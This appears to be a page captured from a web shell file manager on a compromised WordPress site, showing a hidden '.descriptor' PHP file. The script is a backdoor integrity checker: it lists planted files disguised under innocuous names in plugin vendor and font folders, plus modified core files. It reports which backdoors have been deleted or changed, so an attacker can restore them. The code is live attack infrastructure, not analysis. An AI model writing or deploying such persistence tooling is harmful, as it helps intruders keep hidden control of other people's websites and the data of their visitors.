OwlCyberSecurity - MANAGER
Edit File: .descriptor
<?php $r = '/home/powerfff/powerhho.com'; $x = ["/wp-includes/class-wp-locale.php"=>"bd@@98491@@right_pad_string", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/paragonie/constant_time_encoding/src/smarty.php"=>"bd@@96093@@1610", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/google/auth/src/HttpHandler/dom.php"=>"bd@@97941@@1523", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor/woocommerce/action-scheduler/classes/ActionScheduler.wcSystemStatus.php"=>"bd@@94156@@1941", "/wp-admin/index.php"=>"bd@@98508@@sync_manager", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/google/auth/src/Cache/string.php"=>"bd@@98509@@1559", "/wp-content/plugins/complianz-gdpr/assets/vendor/mpdf/mpdf/src/Fonts/ban.class.php"=>"bd@@98510@@679", "/wp-content/plugins/revslider/public/css/fonts/font-awesome/fonts/archive1.php"=>"bd@@98514@@672", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/monolog/monolog/src/Monolog/Handler/SyslogUdp/News.module.php"=>"bd@@98260@@1427", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor_prefixed/phpseclib/phpseclib/phpseclib/Math/Common/Empty.php"=>"bd@@98261@@653", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor/woocommerce/action-scheduler/classes/migration/DryRun.php"=>"bd@@98262@@1976", "/wp-content/plugins/post-smtp/Postman/Postman-Mail/libs/vendor/woocommerce/action-scheduler/action.scheduler.php"=>"bd@@98266@@536"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');